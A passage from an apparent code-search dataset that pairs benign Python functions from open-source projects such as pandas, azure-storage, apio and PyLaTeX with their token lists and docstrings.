"aspect", "and", "crop", ")", ")", ":", "# target is wider than image, set height as maximum", "target_height", "=", "height", "# calculate width", "# - iw / ih = tw / th (keep aspect)", "# => th ( iw / ih ) = tw", "target_width", "=", "float", "(", "target_height", ")", "*", "aspect", "if", "crop", ":", "# calculate crop coords", "# - ( tw - w ) / 2", "target_left", "=", "(", "float", "(", "target_width", ")", "-", "float", "(", "width", ")", ")", "/", "2", "target_left", "=", "int", "(", "round", "(", "target_left", ")", ")", "target_top", "=", "0", "# correct floating point error, and convert to int, round in the", "# direction of the requested width", "if", "width", ">=", "target_width", ":", "target_width", "=", "int", "(", "math", ".", "ceil", "(", "target_width", ")", ")", "else", ":", "target_width", "=", "int", "(", "math", ".", "floor", "(", "target_width", ")", ")", "else", ":", "# image is wider than target, set width as maximum", "target_width", "=", "width", "# calculate height", "# - iw / ih = tw / th (keep aspect)", "# => tw / ( iw / ih ) = th", "target_height", "=", "float", "(", "target_width", ")", "/", "aspect", "if", "crop", ":", "# calculate crop coords", "# - ( th - h ) / 2", "target_top", "=", "(", "float", "(", "target_height", ")", "-", "float", "(", "height", ")", ")", "/", "2", "target_top", "=", "int", "(", "round", "(", "target_top", ")", ")", "target_left", "=", "0", "# correct floating point error and convert to int", "if", "height", ">=", "target_height", ":", "target_height", "=", "int", "(", "math", ".", "ceil", "(", "target_height", ")", ")", "else", ":", "target_height", "=", "int", "(", "math", ".", "floor", "(", "target_height", ")", ")", "# strip color profiles", "b_image", ".", "strip", "(", ")", "# Resize", "b_image", ".", "resize", "(", "target_width", ",", "target_height", ")", "if", "crop", ":", "# Crop to target", "b_image", ".", "crop", "(", "left", "=", "target_left", ",", "top", "=", "target_top", ",", "width", "=", "width", ",", "height", "=", "height", ")", "# Save to temporary file", "temp_file", "=", "tempfile", ".", "TemporaryFile", "(", ")", "b_image", ".", "save", "(", "file", "=", "temp_file", ")", "# Rewind the file", "temp_file", ".", "seek", "(", "0", ")", "return", "temp_file" ]
Resize the image with respect to the aspect ratio
[ "Resize", "the", "image", "with", "respect", "to", "the", "aspect", "ratio" ]
python
train
FPGAwars/apio
apio/managers/scons.py
https://github.com/FPGAwars/apio/blob/5c6310f11a061a760764c6b5847bfb431dc3d0bc/apio/managers/scons.py#L301-L326
def run(self, command, variables=[], board=None, packages=[]): """Executes scons for building""" # -- Check for the SConstruct file if not isfile(util.safe_join(util.get_project_dir(), 'SConstruct')): variables += ['-f'] variables += [util.safe_join( util.get_folder('resources'), 'SConstruct')] else: click.secho('Info: use custom SConstruct file') # -- Resolve packages if self.profile.check_exe_default(): # Run on `default` config mode if not util.resolve_packages( packages, self.profile.packages, self.resources.distribution.get('packages') ): # Exit if a package is not installed raise Exception else: click.secho('Info: native config mode') # -- Execute scons return self._execute_scons(command, variables, board)
[ "def", "run", "(", "self", ",", "command", ",", "variables", "=", "[", "]", ",", "board", "=", "None", ",", "packages", "=", "[", "]", ")", ":", "# -- Check for the SConstruct file", "if", "not", "isfile", "(", "util", ".", "safe_join", "(", "util", ".", "get_project_dir", "(", ")", ",", "'SConstruct'", ")", ")", ":", "variables", "+=", "[", "'-f'", "]", "variables", "+=", "[", "util", ".", "safe_join", "(", "util", ".", "get_folder", "(", "'resources'", ")", ",", "'SConstruct'", ")", "]", "else", ":", "click", ".", "secho", "(", "'Info: use custom SConstruct file'", ")", "# -- Resolve packages", "if", "self", ".", "profile", ".", "check_exe_default", "(", ")", ":", "# Run on `default` config mode", "if", "not", "util", ".", "resolve_packages", "(", "packages", ",", "self", ".", "profile", ".", "packages", ",", "self", ".", "resources", ".", "distribution", ".", "get", "(", "'packages'", ")", ")", ":", "# Exit if a package is not installed", "raise", "Exception", "else", ":", "click", ".", "secho", "(", "'Info: native config mode'", ")", "# -- Execute scons", "return", "self", ".", "_execute_scons", "(", "command", ",", "variables", ",", "board", ")" ]
Executes scons for building
[ "Executes", "scons", "for", "building" ]
python
train
pypa/pipenv
pipenv/vendor/toml/encoder.py
https://github.com/pypa/pipenv/blob/cae8d76c210b9777e90aab76e9c4b0e53bb19cde/pipenv/vendor/toml/encoder.py#L11-L29
def dump(o, f): """Writes out dict as toml to a file Args: o: Object to dump into toml f: File descriptor where the toml should be stored Returns: String containing the toml corresponding to dictionary Raises: TypeError: When anything other than file descriptor is passed """ if not f.write: raise TypeError("You can only dump an object to a file descriptor") d = dumps(o) f.write(d) return d
[ "def", "dump", "(", "o", ",", "f", ")", ":", "if", "not", "f", ".", "write", ":", "raise", "TypeError", "(", "\"You can only dump an object to a file descriptor\"", ")", "d", "=", "dumps", "(", "o", ")", "f", ".", "write", "(", "d", ")", "return", "d" ]
Writes out dict as toml to a file Args: o: Object to dump into toml f: File descriptor where the toml should be stored Returns: String containing the toml corresponding to dictionary Raises: TypeError: When anything other than file descriptor is passed
[ "Writes", "out", "dict", "as", "toml", "to", "a", "file" ]
python
train
wangwenpei/fantasy
fantasy/utils.py
https://github.com/wangwenpei/fantasy/blob/0fe92059bd868f14da84235beb05b217b1d46e4a/fantasy/utils.py#L29-L38
def config_value(key, app=None, default=None, prefix='hive_'): """Get a Flask-Security configuration value. :param key: The configuration key without the prefix `SECURITY_` :param app: An optional specific application to inspect. Defaults to Flask's `current_app` :param default: An optional default value if the value is not set """ app = app or current_app return get_config(app, prefix=prefix).get(key.upper(), default)
[ "def", "config_value", "(", "key", ",", "app", "=", "None", ",", "default", "=", "None", ",", "prefix", "=", "'hive_'", ")", ":", "app", "=", "app", "or", "current_app", "return", "get_config", "(", "app", ",", "prefix", "=", "prefix", ")", ".", "get", "(", "key", ".", "upper", "(", ")", ",", "default", ")" ]
Get a Flask-Security configuration value. :param key: The configuration key without the prefix `SECURITY_` :param app: An optional specific application to inspect. Defaults to Flask's `current_app` :param default: An optional default value if the value is not set
[ "Get", "a", "Flask", "-", "Security", "configuration", "value", "." ]
python
test
theosysbio/means
src/means/io/sbml.py
https://github.com/theosysbio/means/blob/fe164916a1d84ab2a4fa039871d38ccdf638b1db/src/means/io/sbml.py#L55-L125
def read_sbml(filename): """ Read the model from a SBML file. :param filename: SBML filename to read the model from :return: A tuple, consisting of :class:`~means.core.model.Model` instance, set of parameter values, and set of initial conditions variables. """ import libsbml if not os.path.exists(filename): raise IOError('File {0!r} does not exist'.format(filename)) reader = libsbml.SBMLReader() document = reader.readSBML(filename) sbml_model = document.getModel() if not sbml_model: raise ValueError('Cannot parse SBML model from {0!r}'.format(filename)) species = sympy.symbols([s.getId() for s in sbml_model.getListOfSpecies()]) initial_conditions = [s.getInitialConcentration() for s in sbml_model.getListOfSpecies()] compartments = sympy.symbols([s.getId() for s in sbml_model.getListOfCompartments()]) compartment_sizes = [s.getSize() for s in sbml_model.getListOfCompartments()] reactions = map(_parse_reaction, sbml_model.getListOfReactions()) # getListOfParameters is an attribute of the model for SBML Level 1&2 parameters_with_values = [(sympy.Symbol(p.getId()), p.getValue()) for p in sbml_model.getListOfParameters()] parameter_values = dict(parameters_with_values) parameters = map(lambda x: x[0], parameters_with_values) if not parameters: track_local_parameters = True parameters = set() parameter_values = {} else: track_local_parameters = False stoichiometry_matrix = np.zeros((len(species), len(reactions)), dtype=int) propensities = [] for reaction_index, reaction in enumerate(reactions): if track_local_parameters: for param, value in reaction.parameters: parameters.add(param) parameter_values[param] = value reactants = reaction.reactants products = reaction.products propensities.append(reaction.propensity) for species_index, species_id in enumerate(species): net_stoichiometry = products.get(species_id, 0) - reactants.get(species_id, 0) stoichiometry_matrix[species_index, reaction_index] = net_stoichiometry if track_local_parameters: # sympy does not allow sorting its parameter lists by default, # explicitly tell to sort by str representation sorted_parameters = sorted(parameters, key=str) else: sorted_parameters = parameters parameter_values_list = [parameter_values[p] for p in sorted_parameters] # We need to concatenate compartment names and parameters as in our framework we cannot differentiate the two compartments_and_parameters = compartments + sorted_parameters parameter_values_list = compartment_sizes + parameter_values_list model = Model(species, compartments_and_parameters, propensities, stoichiometry_matrix) return model, parameter_values_list, initial_conditions
[ "def", "read_sbml", "(", "filename", ")", ":", "import", "libsbml", "if", "not", "os", ".", "path", ".", "exists", "(", "filename", ")", ":", "raise", "IOError", "(", "'File {0!r} does not exist'", ".", "format", "(", "filename", ")", ")", "reader", "=", "libsbml", ".", "SBMLReader", "(", ")", "document", "=", "reader", ".", "readSBML", "(", "filename", ")", "sbml_model", "=", "document", ".", "getModel", "(", ")", "if", "not", "sbml_model", ":", "raise", "ValueError", "(", "'Cannot parse SBML model from {0!r}'", ".", "format", "(", "filename", ")", ")", "species", "=", "sympy", ".", "symbols", "(", "[", "s", ".", "getId", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfSpecies", "(", ")", "]", ")", "initial_conditions", "=", "[", "s", ".", "getInitialConcentration", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfSpecies", "(", ")", "]", "compartments", "=", "sympy", ".", "symbols", "(", "[", "s", ".", "getId", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfCompartments", "(", ")", "]", ")", "compartment_sizes", "=", "[", "s", ".", "getSize", "(", ")", "for", "s", "in", "sbml_model", ".", "getListOfCompartments", "(", ")", "]", "reactions", "=", "map", "(", "_parse_reaction", ",", "sbml_model", ".", "getListOfReactions", "(", ")", ")", "# getListOfParameters is an attribute of the model for SBML Level 1&2", "parameters_with_values", "=", "[", "(", "sympy", ".", "Symbol", "(", "p", ".", "getId", "(", ")", ")", ",", "p", ".", "getValue", "(", ")", ")", "for", "p", "in", "sbml_model", ".", "getListOfParameters", "(", ")", "]", "parameter_values", "=", "dict", "(", "parameters_with_values", ")", "parameters", "=", "map", "(", "lambda", "x", ":", "x", "[", "0", "]", ",", "parameters_with_values", ")", "if", "not", "parameters", ":", "track_local_parameters", "=", "True", "parameters", "=", "set", "(", ")", "parameter_values", "=", "{", "}", "else", ":", "track_local_parameters", "=", "False", "stoichiometry_matrix", "=", "np", ".", "zeros", "(", "(", "len", "(", "species", ")", ",", "len", "(", "reactions", ")", ")", ",", "dtype", "=", "int", ")", "propensities", "=", "[", "]", "for", "reaction_index", ",", "reaction", "in", "enumerate", "(", "reactions", ")", ":", "if", "track_local_parameters", ":", "for", "param", ",", "value", "in", "reaction", ".", "parameters", ":", "parameters", ".", "add", "(", "param", ")", "parameter_values", "[", "param", "]", "=", "value", "reactants", "=", "reaction", ".", "reactants", "products", "=", "reaction", ".", "products", "propensities", ".", "append", "(", "reaction", ".", "propensity", ")", "for", "species_index", ",", "species_id", "in", "enumerate", "(", "species", ")", ":", "net_stoichiometry", "=", "products", ".", "get", "(", "species_id", ",", "0", ")", "-", "reactants", ".", "get", "(", "species_id", ",", "0", ")", "stoichiometry_matrix", "[", "species_index", ",", "reaction_index", "]", "=", "net_stoichiometry", "if", "track_local_parameters", ":", "# sympy does not allow sorting its parameter lists by default,", "# explicitly tell to sort by str representation", "sorted_parameters", "=", "sorted", "(", "parameters", ",", "key", "=", "str", ")", "else", ":", "sorted_parameters", "=", "parameters", "parameter_values_list", "=", "[", "parameter_values", "[", "p", "]", "for", "p", "in", "sorted_parameters", "]", "# We need to concatenate compartment names and parameters as in our framework we cannot differentiate the two", "compartments_and_parameters", "=", "compartments", "+", "sorted_parameters", "parameter_values_list", "=", "compartment_sizes", "+", "parameter_values_list", "model", "=", "Model", "(", "species", ",", "compartments_and_parameters", ",", "propensities", ",", "stoichiometry_matrix", ")", "return", "model", ",", "parameter_values_list", ",", "initial_conditions" ]
Read the model from a SBML file. :param filename: SBML filename to read the model from :return: A tuple, consisting of :class:`~means.core.model.Model` instance, set of parameter values, and set of initial conditions variables.
[ "Read", "the", "model", "from", "a", "SBML", "file", "." ]
python
train
pszafer/epson_projector
epson_projector/main.py
https://github.com/pszafer/epson_projector/blob/b8a10ace56e0a5cf858546041819c0e7ebca208f/epson_projector/main.py#L52-L56
def __initLock(self): """Init lock for sending request to projector when it is busy.""" self._isLocked = False self._timer = 0 self._operation = False
[ "def", "__initLock", "(", "self", ")", ":", "self", ".", "_isLocked", "=", "False", "self", ".", "_timer", "=", "0", "self", ".", "_operation", "=", "False" ]
Init lock for sending request to projector when it is busy.
[ "Init", "lock", "for", "sending", "request", "to", "projector", "when", "it", "is", "busy", "." ]
python
train
DLR-RM/RAFCON
source/rafcon/gui/mygaphas/items/line.py
https://github.com/DLR-RM/RAFCON/blob/24942ef1a904531f49ab8830a1dbb604441be498/source/rafcon/gui/mygaphas/items/line.py#L309-L316
def _head_length(self, port): """Distance from the center of the port to the perpendicular waypoint""" if not port: return 0. parent_state_v = self.get_parent_state_v() if parent_state_v is port.parent: # port of connection's parent state return port.port_size[1] return max(port.port_size[1] * 1.5, self._calc_line_width() / 1.3)
[ "def", "_head_length", "(", "self", ",", "port", ")", ":", "if", "not", "port", ":", "return", "0.", "parent_state_v", "=", "self", ".", "get_parent_state_v", "(", ")", "if", "parent_state_v", "is", "port", ".", "parent", ":", "# port of connection's parent state", "return", "port", ".", "port_size", "[", "1", "]", "return", "max", "(", "port", ".", "port_size", "[", "1", "]", "*", "1.5", ",", "self", ".", "_calc_line_width", "(", ")", "/", "1.3", ")" ]
Distance from the center of the port to the perpendicular waypoint
[ "Distance", "from", "the", "center", "of", "the", "port", "to", "the", "perpendicular", "waypoint" ]
python
train
JonathanRaiman/ciseau
ciseau/word_tokenizer.py
https://github.com/JonathanRaiman/ciseau/blob/f72d1c82d85eeb3d3ac9fac17690041725402175/ciseau/word_tokenizer.py#L185-L260
def tokenize(text, normalize_ascii=True): """ Convert a single string into a list of substrings split along punctuation and word boundaries. Keep whitespace intact by always attaching it to the previous token. Arguments: ---------- text : str normalize_ascii : bool, perform some replacements on non-ascii characters to canonicalize the string (defaults to True). Returns: -------- list<str>, list of substring tokens. """ # 1. If there's no punctuation, return immediately if no_punctuation.match(text): return [text] # 2. let's standardize the input text to ascii (if desired) # Note: this will no longer respect input-to-output character positions if normalize_ascii: # normalize these greco-roman characters to ascii: text = text.replace(u"œ", "oe").replace(u"æ", "ae") # normalize dashes: text = repeated_dash_converter.sub("-", text) # 3. let's construct an integer array of the possible split locations: split_locations = [UNDECIDED] * len(text) regexes = ( pure_whitespace, left_quote_shifter, left_quote_converter, left_single_quote_converter, remaining_quote_converter, # regex can't fix this -> regex ca n't fix this english_nots, # you'll dig this -> you 'll dig this english_contractions, # the rhino's horns -> the rhino 's horns english_specific_appendages, # qu'a tu fais au rhino -> qu ' a tu fais au rhino, french_appendages ) # 4. Mark end locations for specific regular expressions: for regex in regexes: mark_regex(regex, text, split_locations) begin_end_regexes = ( multi_single_quote_finder, right_single_quote_converter, # use dashes as the breakpoint: # the rhino--truck -> the rhino -- truck simple_dash_finder if normalize_ascii else advanced_dash_finder, numerical_expression, url_file_finder, shifted_ellipses, # the #rhino! -> the # rhino ! ; # the rino[sic] -> the rino [ sic ] shifted_standard_punctuation ) # 5. Mark begin and end locations for other regular expressions: for regex in begin_end_regexes: mark_begin_end_regex(regex, text, split_locations) # 6. Remove splitting on exceptional uses of periods: # I'm with Mr. -> I 'm with Mr. , I'm with Mister. -> I 'm with Mister . protect_shorthand(text, split_locations) if normalize_ascii: text = dash_converter.sub("-", text) # 7. Return the split string using the integer list: return list(split_with_locations(text, split_locations))
[ "def", "tokenize", "(", "text", ",", "normalize_ascii", "=", "True", ")", ":", "# 1. If there's no punctuation, return immediately", "if", "no_punctuation", ".", "match", "(", "text", ")", ":", "return", "[", "text", "]", "# 2. let's standardize the input text to ascii (if desired)", "# Note: this will no longer respect input-to-output character positions", "if", "normalize_ascii", ":", "# normalize these greco-roman characters to ascii:", "text", "=", "text", ".", "replace", "(", "u\"œ\",", " ", "oe\")", ".", "r", "eplace(", "u", "\"æ\", ", "\"", "e\")", "", "# normalize dashes:", "text", "=", "repeated_dash_converter", ".", "sub", "(", "\"-\"", ",", "text", ")", "# 3. let's construct an integer array of the possible split locations:", "split_locations", "=", "[", "UNDECIDED", "]", "*", "len", "(", "text", ")", "regexes", "=", "(", "pure_whitespace", ",", "left_quote_shifter", ",", "left_quote_converter", ",", "left_single_quote_converter", ",", "remaining_quote_converter", ",", "# regex can't fix this -> regex ca n't fix this", "english_nots", ",", "# you'll dig this -> you 'll dig this", "english_contractions", ",", "# the rhino's horns -> the rhino 's horns", "english_specific_appendages", ",", "# qu'a tu fais au rhino -> qu ' a tu fais au rhino,", "french_appendages", ")", "# 4. Mark end locations for specific regular expressions:", "for", "regex", "in", "regexes", ":", "mark_regex", "(", "regex", ",", "text", ",", "split_locations", ")", "begin_end_regexes", "=", "(", "multi_single_quote_finder", ",", "right_single_quote_converter", ",", "# use dashes as the breakpoint:", "# the rhino--truck -> the rhino -- truck", "simple_dash_finder", "if", "normalize_ascii", "else", "advanced_dash_finder", ",", "numerical_expression", ",", "url_file_finder", ",", "shifted_ellipses", ",", "# the #rhino! -> the # rhino ! ;", "# the rino[sic] -> the rino [ sic ]", "shifted_standard_punctuation", ")", "# 5. Mark begin and end locations for other regular expressions:", "for", "regex", "in", "begin_end_regexes", ":", "mark_begin_end_regex", "(", "regex", ",", "text", ",", "split_locations", ")", "# 6. Remove splitting on exceptional uses of periods:", "# I'm with Mr. -> I 'm with Mr. , I'm with Mister. -> I 'm with Mister .", "protect_shorthand", "(", "text", ",", "split_locations", ")", "if", "normalize_ascii", ":", "text", "=", "dash_converter", ".", "sub", "(", "\"-\"", ",", "text", ")", "# 7. Return the split string using the integer list:", "return", "list", "(", "split_with_locations", "(", "text", ",", "split_locations", ")", ")" ]
Convert a single string into a list of substrings split along punctuation and word boundaries. Keep whitespace intact by always attaching it to the previous token. Arguments: ---------- text : str normalize_ascii : bool, perform some replacements on non-ascii characters to canonicalize the string (defaults to True). Returns: -------- list<str>, list of substring tokens.
[ "Convert", "a", "single", "string", "into", "a", "list", "of", "substrings", "split", "along", "punctuation", "and", "word", "boundaries", ".", "Keep", "whitespace", "intact", "by", "always", "attaching", "it", "to", "the", "previous", "token", "." ]
python
test
Azure/azure-storage-python
azure-storage-queue/azure/storage/queue/queueservice.py
https://github.com/Azure/azure-storage-python/blob/52327354b192cbcf6b7905118ec6b5d57fa46275/azure-storage-queue/azure/storage/queue/queueservice.py#L414-L450
def list_queues(self, prefix=None, num_results=None, include_metadata=False, marker=None, timeout=None): ''' Returns a generator to list the queues. The generator will lazily follow the continuation tokens returned by the service and stop when all queues have been returned or num_results is reached. If num_results is specified and the account has more than that number of queues, the generator will have a populated next_marker field once it finishes. This marker can be used to create a new generator if more results are desired. :param str prefix: Filters the results to return only queues with names that begin with the specified prefix. :param int num_results: The maximum number of queues to return. :param bool include_metadata: Specifies that container metadata be returned in the response. :param str marker: An opaque continuation token. This value can be retrieved from the next_marker field of a previous generator object if num_results was specified and that generator has finished enumerating results. If specified, this generator will begin returning results from the point where the previous generator stopped. :param int timeout: The server timeout, expressed in seconds. This function may make multiple calls to the service in which case the timeout value specified will be applied to each individual call. ''' include = 'metadata' if include_metadata else None operation_context = _OperationContext(location_lock=True) kwargs = {'prefix': prefix, 'max_results': num_results, 'include': include, 'marker': marker, 'timeout': timeout, '_context': operation_context} resp = self._list_queues(**kwargs) return ListGenerator(resp, self._list_queues, (), kwargs)
[ "def", "list_queues", "(", "self", ",", "prefix", "=", "None", ",", "num_results", "=", "None", ",", "include_metadata", "=", "False", ",", "marker", "=", "None", ",", "timeout", "=", "None", ")", ":", "include", "=", "'metadata'", "if", "include_metadata", "else", "None", "operation_context", "=", "_OperationContext", "(", "location_lock", "=", "True", ")", "kwargs", "=", "{", "'prefix'", ":", "prefix", ",", "'max_results'", ":", "num_results", ",", "'include'", ":", "include", ",", "'marker'", ":", "marker", ",", "'timeout'", ":", "timeout", ",", "'_context'", ":", "operation_context", "}", "resp", "=", "self", ".", "_list_queues", "(", "*", "*", "kwargs", ")", "return", "ListGenerator", "(", "resp", ",", "self", ".", "_list_queues", ",", "(", ")", ",", "kwargs", ")" ]
Returns a generator to list the queues. The generator will lazily follow the continuation tokens returned by the service and stop when all queues have been returned or num_results is reached. If num_results is specified and the account has more than that number of queues, the generator will have a populated next_marker field once it finishes. This marker can be used to create a new generator if more results are desired. :param str prefix: Filters the results to return only queues with names that begin with the specified prefix. :param int num_results: The maximum number of queues to return. :param bool include_metadata: Specifies that container metadata be returned in the response. :param str marker: An opaque continuation token. This value can be retrieved from the next_marker field of a previous generator object if num_results was specified and that generator has finished enumerating results. If specified, this generator will begin returning results from the point where the previous generator stopped. :param int timeout: The server timeout, expressed in seconds. This function may make multiple calls to the service in which case the timeout value specified will be applied to each individual call.
[ "Returns", "a", "generator", "to", "list", "the", "queues", ".", "The", "generator", "will", "lazily", "follow", "the", "continuation", "tokens", "returned", "by", "the", "service", "and", "stop", "when", "all", "queues", "have", "been", "returned", "or", "num_results", "is", "reached", "." ]
python
train
sorgerlab/indra
indra/sources/tees/processor.py
https://github.com/sorgerlab/indra/blob/79a70415832c5702d7a820c7c9ccc8e25010124b/indra/sources/tees/processor.py#L188-L199
def get_related_node(self, node, relation): """Looks for an edge from node to some other node, such that the edge is annotated with the given relation. If there exists such an edge, returns the name of the node it points to. Otherwise, returns None.""" G = self.G for edge in G.edges(node): to = edge[1] to_relation = G.edges[node, to]['relation'] if to_relation == relation: return to return None
[ "def", "get_related_node", "(", "self", ",", "node", ",", "relation", ")", ":", "G", "=", "self", ".", "G", "for", "edge", "in", "G", ".", "edges", "(", "node", ")", ":", "to", "=", "edge", "[", "1", "]", "to_relation", "=", "G", ".", "edges", "[", "node", ",", "to", "]", "[", "'relation'", "]", "if", "to_relation", "==", "relation", ":", "return", "to", "return", "None" ]
Looks for an edge from node to some other node, such that the edge is annotated with the given relation. If there exists such an edge, returns the name of the node it points to. Otherwise, returns None.
[ "Looks", "for", "an", "edge", "from", "node", "to", "some", "other", "node", "such", "that", "the", "edge", "is", "annotated", "with", "the", "given", "relation", ".", "If", "there", "exists", "such", "an", "edge", "returns", "the", "name", "of", "the", "node", "it", "points", "to", ".", "Otherwise", "returns", "None", "." ]
python
train
rigetti/quantumflow
quantumflow/visualization.py
https://github.com/rigetti/quantumflow/blob/13a66cabbe8aabf6e023cc675f4a4ebe6ccda8fb/quantumflow/visualization.py#L308-L327
def circuit_to_image(circ: Circuit, qubits: Qubits = None) -> PIL.Image: # pragma: no cover """Create an image of a quantum circuit. A convenience function that calls circuit_to_latex() and render_latex(). Args: circ: A quantum Circuit qubits: Optional qubit list to specify qubit order Returns: Returns: A PIL Image (Use img.show() to display) Raises: NotImplementedError: For unsupported gates. OSError: If an external dependency is not installed. """ latex = circuit_to_latex(circ, qubits) img = render_latex(latex) return img
[ "def", "circuit_to_image", "(", "circ", ":", "Circuit", ",", "qubits", ":", "Qubits", "=", "None", ")", "->", "PIL", ".", "Image", ":", "# pragma: no cover", "latex", "=", "circuit_to_latex", "(", "circ", ",", "qubits", ")", "img", "=", "render_latex", "(", "latex", ")", "return", "img" ]
Create an image of a quantum circuit. A convenience function that calls circuit_to_latex() and render_latex(). Args: circ: A quantum Circuit qubits: Optional qubit list to specify qubit order Returns: Returns: A PIL Image (Use img.show() to display) Raises: NotImplementedError: For unsupported gates. OSError: If an external dependency is not installed.
[ "Create", "an", "image", "of", "a", "quantum", "circuit", "." ]
python
train
Robpol86/flake8-pydocstyle
flake8_pydocstyle.py
https://github.com/Robpol86/flake8-pydocstyle/blob/657425541e1d868a6a5241a83c3a16a9a715d6b5/flake8_pydocstyle.py#L20-L43
def load_file(filename): """Read file to memory. For stdin sourced files, this function does something super duper incredibly hacky and shameful. So so shameful. I'm obtaining the original source code of the target module from the only instance of pycodestyle.Checker through the Python garbage collector. Flake8's API doesn't give me the original source code of the module we are checking. Instead it has pycodestyle give me an AST object of the module (already parsed). This unfortunately loses valuable information like the kind of quotes used for strings (no way to know if a docstring was surrounded by triple double quotes or just one single quote, thereby rendering pydocstyle's D300 error as unusable). This will break one day. I'm sure of it. For now it fixes https://github.com/Robpol86/flake8-pydocstyle/issues/2 :param str filename: File path or 'stdin'. From Main().filename. :return: First item is the filename or 'stdin', second are the contents of the file. :rtype: tuple """ if filename in ('stdin', '-', None): instances = [i for i in gc.get_objects() if isinstance(i, pycodestyle.Checker) or isinstance(i, pep8.Checker)] if len(instances) != 1: raise ValueError('Expected only 1 instance of pycodestyle.Checker, got {0} instead.'.format(len(instances))) return 'stdin', ''.join(instances[0].lines) with codecs.open(filename, encoding='utf-8') as handle: return filename, handle.read()
[ "def", "load_file", "(", "filename", ")", ":", "if", "filename", "in", "(", "'stdin'", ",", "'-'", ",", "None", ")", ":", "instances", "=", "[", "i", "for", "i", "in", "gc", ".", "get_objects", "(", ")", "if", "isinstance", "(", "i", ",", "pycodestyle", ".", "Checker", ")", "or", "isinstance", "(", "i", ",", "pep8", ".", "Checker", ")", "]", "if", "len", "(", "instances", ")", "!=", "1", ":", "raise", "ValueError", "(", "'Expected only 1 instance of pycodestyle.Checker, got {0} instead.'", ".", "format", "(", "len", "(", "instances", ")", ")", ")", "return", "'stdin'", ",", "''", ".", "join", "(", "instances", "[", "0", "]", ".", "lines", ")", "with", "codecs", ".", "open", "(", "filename", ",", "encoding", "=", "'utf-8'", ")", "as", "handle", ":", "return", "filename", ",", "handle", ".", "read", "(", ")" ]
Read file to memory. For stdin sourced files, this function does something super duper incredibly hacky and shameful. So so shameful. I'm obtaining the original source code of the target module from the only instance of pycodestyle.Checker through the Python garbage collector. Flake8's API doesn't give me the original source code of the module we are checking. Instead it has pycodestyle give me an AST object of the module (already parsed). This unfortunately loses valuable information like the kind of quotes used for strings (no way to know if a docstring was surrounded by triple double quotes or just one single quote, thereby rendering pydocstyle's D300 error as unusable). This will break one day. I'm sure of it. For now it fixes https://github.com/Robpol86/flake8-pydocstyle/issues/2 :param str filename: File path or 'stdin'. From Main().filename. :return: First item is the filename or 'stdin', second are the contents of the file. :rtype: tuple
[ "Read", "file", "to", "memory", "." ]
python
train
JelteF/PyLaTeX
pylatex/tikz.py
https://github.com/JelteF/PyLaTeX/blob/62d9d9912ce8445e6629cdbcb80ad86143a1ed23/pylatex/tikz.py#L230-L247
def dumps(self): """Return string representation of the node.""" ret_str = [] ret_str.append(Command('node', options=self.options).dumps()) if self.handle is not None: ret_str.append('({})'.format(self.handle)) if self._node_position is not None: ret_str.append('at {}'.format(str(self._position))) if self._node_text is not None: ret_str.append('{{{text}}};'.format(text=self._node_text)) else: ret_str.append('{};') return ' '.join(ret_str)
[ "def", "dumps", "(", "self", ")", ":", "ret_str", "=", "[", "]", "ret_str", ".", "append", "(", "Command", "(", "'node'", ",", "options", "=", "self", ".", "options", ")", ".", "dumps", "(", ")", ")", "if", "self", ".", "handle", "is", "not", "None", ":", "ret_str", ".", "append", "(", "'({})'", ".", "format", "(", "self", ".", "handle", ")", ")", "if", "self", ".", "_node_position", "is", "not", "None", ":", "ret_str", ".", "append", "(", "'at {}'", ".", "format", "(", "str", "(", "self", ".", "_position", ")", ")", ")", "if", "self", ".", "_node_text", "is", "not", "None", ":", "ret_str", ".", "append", "(", "'{{{text}}};'", ".", "format", "(", "text", "=", "self", ".", "_node_text", ")", ")", "else", ":", "ret_str", ".", "append", "(", "'{};'", ")", "return", "' '", ".", "join", "(", "ret_str", ")" ]
Return string representation of the node.
[ "Return", "string", "representation", "of", "the", "node", "." ]
python
train
pandas-dev/pandas
pandas/plotting/_core.py
https://github.com/pandas-dev/pandas/blob/9feb3ad92cc0397a04b665803a49299ee7aa1037/pandas/plotting/_core.py#L3248-L3293
def hist(self, by=None, bins=10, **kwds): """ Draw one histogram of the DataFrame's columns. A histogram is a representation of the distribution of data. This function groups the values of all given Series in the DataFrame into bins and draws all bins in one :class:`matplotlib.axes.Axes`. This is useful when the DataFrame's Series are in a similar scale. Parameters ---------- by : str or sequence, optional Column in the DataFrame to group by. bins : int, default 10 Number of histogram bins to be used. **kwds Additional keyword arguments are documented in :meth:`DataFrame.plot`. Returns ------- class:`matplotlib.AxesSubplot` Return a histogram plot. See Also -------- DataFrame.hist : Draw histograms per DataFrame's Series. Series.hist : Draw a histogram with Series' data. Examples -------- When we draw a dice 6000 times, we expect to get each value around 1000 times. But when we draw two dices and sum the result, the distribution is going to be quite different. A histogram illustrates those distributions. .. plot:: :context: close-figs >>> df = pd.DataFrame( ... np.random.randint(1, 7, 6000), ... columns = ['one']) >>> df['two'] = df['one'] + np.random.randint(1, 7, 6000) >>> ax = df.plot.hist(bins=12, alpha=0.5) """ return self(kind='hist', by=by, bins=bins, **kwds)
[ "def", "hist", "(", "self", ",", "by", "=", "None", ",", "bins", "=", "10", ",", "*", "*", "kwds", ")", ":", "return", "self", "(", "kind", "=", "'hist'", ",", "by", "=", "by", ",", "bins", "=", "bins", ",", "*", "*", "kwds", ")" ]
Draw one histogram of the DataFrame's columns. A histogram is a representation of the distribution of data. This function groups the values of all given Series in the DataFrame into bins and draws all bins in one :class:`matplotlib.axes.Axes`. This is useful when the DataFrame's Series are in a similar scale. Parameters ---------- by : str or sequence, optional Column in the DataFrame to group by. bins : int, default 10 Number of histogram bins to be used. **kwds Additional keyword arguments are documented in :meth:`DataFrame.plot`. Returns ------- class:`matplotlib.AxesSubplot` Return a histogram plot. See Also -------- DataFrame.hist : Draw histograms per DataFrame's Series. Series.hist : Draw a histogram with Series' data. Examples -------- When we draw a dice 6000 times, we expect to get each value around 1000 times. But when we draw two dices and sum the result, the distribution is going to be quite different. A histogram illustrates those distributions. .. plot:: :context: close-figs >>> df = pd.DataFrame( ... np.random.randint(1, 7, 6000), ... columns = ['one']) >>> df['two'] = df['one'] + np.random.randint(1, 7, 6000) >>> ax = df.plot.hist(bins=12, alpha=0.5)
[ "Draw", "one", "histogram", "of", "the", "DataFrame", "s", "columns", "." ]
python
train
jaraco/keyring
keyring/backends/SecretService.py
